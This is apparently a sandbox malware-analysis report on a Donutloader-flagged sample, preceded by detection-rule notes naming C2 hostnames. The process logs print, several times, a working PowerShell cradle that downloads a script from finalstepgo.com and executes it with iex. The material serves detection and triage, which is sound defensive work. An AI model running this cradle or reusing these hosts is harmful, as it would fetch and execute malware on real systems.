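    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: example.com
    """
    SESSION = [parse_request(r) for r in (PS_CRADLE, BITS_FETCH, BEACON, BEACON_WITH_COOKIE, BENIGN)]
    ```

    The Chrome User-Agent rule is deliberately weak on its own (a real browser sends the same string; the benign sample proves it), so the per-request rule only fires together with the POST /api form shape, and the session rule is what gives confidence for the cradle. Note from the TLS entries that 172.67.206.221 is Cloudflare address space, so the C2 has to be blocked by hostname (racedsuitreow.shop, plus candleduseiwo.shop which is queried but never contacted), not by IP.
    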

    System Summary

    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
    Source: 00000004.00000002.2151875122.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00FDC583 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00FCC583 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_0045D070 RegCloseKey,DeviceIoControl,swprintf,CreateFileW,DeviceIoControl,_memset,DeviceIoControl,DeviceIoControl,DeviceIoControl,CloseHandle
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_0041D0B0 PathFileExistsW,OpenSCManagerW,GetLastError,OpenServiceW,CloseServiceHandle,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,CloseServiceHandle
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_0050E640
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_0043D090
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_0050F158
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_0050715B
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_004E9350
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_004133B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_0049B470
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_0050E674
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_0044B630
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_0051B680
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_0045F770
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_004237D0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_004C3850
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_004C28B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_0050F955
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_0050F974
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_0044AB40
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_004AEBE0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_0040FD70
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00514E40
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00441E60
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00FDC583
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00F8055F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00FB80E2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00F931C2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00FCC2B2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00F85292
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00FB8372
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00FDD5C4
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00FAD652
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00FB9792
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00F898B2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00F8E802
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00FAB99B
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00F8CAE2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00F8DA82
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00FB9A42
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00F83A08
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00FA0B95
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00F82CB5
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00FBFCA2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00FC9DB2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00F82D5B
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00F86EFD
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00F8BEE2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00F86EB2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00F88EB2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00F82E8E
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00F82E1A
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00F82FB3
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00F8CF72
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051AB570
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051A15B1
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051A1418
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051A148C
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051A54B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051A74B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051A54FB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051AA4E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051B17C0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051D66E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051BF193
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051A2006
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051D8040
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051AC080
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051AB0E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051A1359
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051E83B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051A12B3
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051DE2A0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051D7D90
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051CBC50
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051C9F99
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051ACE00
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051A7EB0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051D6970
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_051A3890
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00FCC583
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00F7055F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00FA80E2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00F831C2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00FBC2B2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00F75292
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00FA8372
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00FCD5C4
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00F9D652
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00FA9792
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00F798B2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00F7E802
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00F9B99B
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00F7CAE2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00F7DA82
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00FA9A42
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00F73A08
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00F90B95
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00F72CB5
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00FAFCA2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00FB9DB2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00F72D5B
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00F76EFD
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00F7BEE2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00F76EB2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00F78EB2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00F72E8E
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00F72E1A
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00F72FB3
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_00F7CF72
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_011EF193
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_011D2006
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_01208040
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_011DC080
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_011DB0E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_011D1359
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_012183B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_0120E2A0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_011D12B3
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_011DB570
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_011D15B1
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_011D1418
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_011D148C
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_011D54B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_011D74B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_011D54FB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_011DA4E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_011E17C0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_012066E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_01206970
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_011D3890
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_0121A8B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_01207D90
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_011FBC50
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_011F9F99
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_011DCE00
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 8_2_011D7EB0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: String function: 00424910 appears 45 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: String function: 00418CF0 appears 92 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: String function: 004FFB7D appears 31 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: String function: 00F80862 appears 145 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: String function: 011DEE60 appears 145 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: String function: 00439540 appears 36 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: String function: 051ACBE0 appears 83 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: String function: 00F7E5E2 appears 89 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: String function: 00F8E5E2 appears 89 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: String function: 0041F120 appears 65 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: String function: 011DCBE0 appears 93 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: String function: 00406E50 appears 178 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: String function: 051AEE60 appears 122 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: String function: 004C24A0 appears 135 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: String function: 0045EC80 appears 107 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: String function: 0052CF10 appears 37 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: String function: 00407150 appears 69 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: String function: 0045EEC0 appears 42 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: String function: 00F90862 appears 145 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: String function: 004FFB4F appears 47 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: String function: 00418AC0 appears 74 times
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1760
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
    Source: 00000004.00000002.2151875122.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
    Source: classification engine | Classification label: mal100.troj.evad.win@13/30@4/3
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_004030E0 PeekMessageW,PeekMessageW,PeekMessageW,PeekMessageW,PeekMessageW,PeekMessageW,PeekMessageW,GetLastError,FormatMessageW,LocalFree,4_2_004030E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_004D3270 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,GetLastError,4_2_004D3270
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0043E991 GetVolumeInformationW,GetDiskFreeSpaceExW,4_2_0043E991
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: OpenSCManagerW,OpenSCManagerW,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,CloseServiceHandle,OpenSCManagerW,CloseServiceHandle,OpenSCManagerW,OpenSCManagerW,CreateServiceW,ChangeServiceConfig2W,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,CreateServiceW,ChangeServiceConfig2W,CloseServiceHandle,CloseServiceHandle,GetLastError,4_2_0041D320
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: CreateServiceW,ChangeServiceConfig2W,SetLastError,4_2_0041CE80
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00F80C6F CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,CloseHandle,4_2_00F80C6F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051DF006 CoCreateInstance,4_2_051DF006
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_004D3220 FindResourceW,SizeofResource,LoadResource,LockResource,4_2_004D3220
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0041D320 OpenSCManagerW,OpenSCManagerW,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,CloseServiceHandle,OpenSCManagerW,CloseServiceHandle,OpenSCManagerW,OpenSCManagerW,CreateServiceW,ChangeServiceConfig2W,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,CreateServiceW,ChangeServiceConfig2W,CloseServiceHandle,CloseServiceHandle,GetLastError,4_2_0041D320
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\OIlqJYuEJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2504
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6908:120:WilError_03
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess764
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_anvhf53m.wns.ps1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1760
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1740
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1696
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1716
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 764 -s 1728
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $textJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe" Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
